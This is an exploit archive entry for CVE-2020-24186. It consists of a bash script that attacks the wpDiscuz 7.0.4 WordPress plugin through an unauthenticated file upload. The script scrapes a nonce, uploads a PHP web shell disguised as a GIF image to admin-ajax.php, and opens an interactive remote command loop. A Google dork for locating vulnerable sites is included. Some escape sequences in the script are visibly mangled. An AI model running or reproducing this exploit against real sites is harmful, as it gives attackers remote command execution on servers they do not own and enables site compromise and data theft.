Authored by Chloe Chamberland, Juampa Rodriguez

WordPress wpDiscuz plugin version 7.0.4 remote shell upload exploit.

advisories | CVE-2020-24186

# Exploit Title: WordPress Plugin wpDiscuz 7.0.4 - Arbitrary File Upload (Unauthenticated)
# Google Dork: inurl:/wp-content/plugins/wpdiscuz/
# Date: 2021-06-06
# Original Author: Chloe Chamberland
# Exploit Author: Juampa Rodríguez aka UnD3sc0n0c1d0
# Vendor Homepage: https://gvectors.com/
# Software Link: https://downloads.wordpress.org/plugin/wpdiscuz.7.0.4.zip
# Version: 7.0.4
# Tested on: Ubuntu / WordPress 5.6.2
# CVE : CVE-2020-24186

#!/bin/bash

if [ -z $1 ]
then
echo -e "n[i] Usage: exploit.sh [IP] [/index.php/2021/06/06/post]n"
exit 0
elif [ -z $2 ]
then
echo -e "n[i] Usage: exploit.sh [IP] [/index.php/2021/06/06/post]n"
exit 0
else

post=$(curl -sI http://$1$2/ | head -n1)

if [[ "$post" == *"200 OK"* ]]; then
wmu_nonce=$(curl -s http://$1$2/ | sed -r "s/wmuSecurity/nwmuSecurity/g" | grep wmuSecurity | cut -d '"' -f3)
webshell=$(curl -isk -X 'POST' -H 'X-Requested-With: XMLHttpRequest' -H 'Content-Type: multipart/form-data; boundary=---------------------------WebKitFormBoundaryUnD3s' --data-binary $'-----------------------------WebKitFormBoundaryUnD3sx0dx0aContent-Disposition: form-data; name="action"x0dx0ax0dx0awmuUploadFilesx0dx0a-----------------------------WebKitFormBoundaryUnD3sx0dx0aContent-Disposition: form-data; name="wmu_nonce"x0dx0ax0dx0a'$wmu_nonce$'x0dx0a-----------------------------WebKitFormBoundaryUnD3sx0dx0aContent-Disposition: form-data; name="wmuAttachmentsData"x0dx0ax0dx0aundefinedx0dx0a-----------------------------WebKitFormBoundaryUnD3sx0dx0aContent-Disposition: form-data; name="wmu_files[0]"; filename="a.php" Content-Type: image/jpegx0dx0ax0dx0aGIF8x0dx0a<?phpx0dx0aif(isset($_REQUEST['cmd'])){x0dx0a $cmd = ($_REQUEST['cmd']);x0dx0a system($cmd);x0dx0a die;x0dx0a}x0dx0a?>x0dx0a-----------------------------WebKitFormBoundaryUnD3sx0dx0aContent-Disposition: form-data; name="postId"x0dx0ax0dx0a18x0dx0a-----------------------------WebKitFormBoundaryUnD3s--x0dx0a' http://$1/wp-admin/admin-ajax.php | sed 's/":"http/nhttp/g' | grep "http:\/" | cut -d '"' -f1 | sed 's///g')

echo -e "nWebshell:" $webshell"n"
echo -e "--------------WIN--------------"
echo -e " ¡Got webshell! "
echo -e "-------------------------------n"
while :
do
read -p '$ ' command
curl -s $webshell?cmd=$command | grep -v GIF8
done
else
echo -e "n[!] The indicated post was not foundn"
fi
fi